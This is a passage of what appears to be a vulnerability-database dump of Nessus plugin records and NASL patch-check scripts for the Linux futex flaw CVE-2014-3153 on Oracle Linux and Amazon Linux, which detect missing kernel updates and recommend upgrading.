audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-3153\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2014-3038\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-2.6.39-400.215.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-2.6.39-400.215.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-devel-2.6.39-400.215.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-devel-2.6.39-400.215.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-doc-2.6.39-400.215.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-firmware-2.6.39-400.215.2.el5uek\")) flag++;\n\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.215.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.215.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.215.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.215.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.215.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.215.2.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:49:27", "description": "Description of changes:\n\nkernel-uek\n[3.8.13-35.1.1.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: \n18918552] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) \n[Orabug: 18918552] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas \nGleixner) [Orabug: 18918552] {CVE-2014-3153}\n- futex: Forbid uaddr == uaddr2 in futex_requeue(..., requeue_pi=1) \n(Thomas Gleixner) [Orabug: 18918552] {CVE-2014-3153} {CVE-2014-3153}", "edition": 21, "published": "2014-06-09T00:00:00", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2014-3037)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "modified": "2014-06-09T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-35.1.1.el6uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:dtrace-modules-headers", "p-cpe:/a:oracle:linux:dtrace-modules-provider-headers", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2014-3037.NASL", "href": "https://www.tenable.com/plugins/nessus/74376", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3037.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74376);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-3153\");\n script_bugtraq_id(67906);\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2014-3037)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-35.1.1.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: \n18918552] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) \n[Orabug: 18918552] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas \nGleixner) [Orabug: 18918552] {CVE-2014-3153}\n- futex: Forbid uaddr == uaddr2 in futex_requeue(..., requeue_pi=1) \n(Thomas Gleixner) [Orabug: 18918552] {CVE-2014-3153} {CVE-2014-3153}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-June/004174.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-35.1.1.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-provider-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-3153\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2014-3037\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-35.1.1.el6uek-0.4.3-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-headers-0.4.3-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-provider-headers-0.4.3-4.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-35.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-35.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-35.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-35.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-35.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-35.1.1.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:18:50", "description": "The futex_requeue function in kernel/futex.c in the Linux kernel\nthrough 3.14.5 does not ensure that calls have two different futex\naddresses, which allows local users to gain privileges via a crafted\nFUTEX_REQUEUE command that facilitates unsafe waiter modification.", "edition": 24, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : kernel (ALAS-2014-363)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-doc", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:perf-debuginfo", "p-cpe:/a:amazon:linux:kernel-headers", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-363.NASL", "href": "https://www.tenable.com/plugins/nessus/78306", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-363.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78306);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-3153\");\n script_xref(name:\"ALAS\", value:\"2014-363\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2014-363)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The futex_requeue function in kernel/futex.c in the Linux kernel\nthrough 3.14.5 does not ensure that calls have two different futex\naddresses, which allows local users to gain privileges via a crafted\nFUTEX_REQUEUE command that facilitates unsafe waiter modification.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-363.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update kernel' to update your system. You will need to reboot\nyour system in order for the new kernel to be running.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-3.10.42-52.145.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-3.10.42-52.145.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:49:27", "description": "Description of changes:\n\nkernel-uek\n[2.6.32-400.36.2.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: \n18918736] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) \n[Orabug: 18918736] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas \nGleixner) [Orabug: 18918736] {CVE-2014-3153}\n- futex: Forbid uaddr1 == uaddr2 in futex_requeue(..., requeue_pi=1) \n(Thomas Gleixner) [Orabug: 18918736] {CVE-2014-3153} {CVE-2014-3153}", "edition": 21, "published": "2014-06-09T00:00:00", "title": "Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3039)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "modified": "2014-06-09T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el6uek", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el5uekdebug", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el5uekdebug", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el5uek", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el6uekdebug", "p-cpe:/a:oracle:linux:kernel-uek", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el6uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el5uek", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el6uekdebug", "p-cpe:/a:oracle:linux:kernel-uek-headers", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2014-3039.NASL", "href": "https://www.tenable.com/plugins/nessus/74378", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3039.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74378);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-3153\");\n script_bugtraq_id(67906);\n\n script_name(english:\"Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3039)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[2.6.32-400.36.2.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: \n18918736] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) \n[Orabug: 18918736] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas \nGleixner) [Orabug: 18918736] {CVE-2014-3153}\n- futex: Forbid uaddr1 == uaddr2 in futex_requeue(..., requeue_pi=1) \n(Thomas Gleixner) [Orabug: 18918736] {CVE-2014-3153} {CVE-2014-3153}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-June/004178.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-June/004179.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el5uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el5uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el6uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el5uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el5uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el6uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise 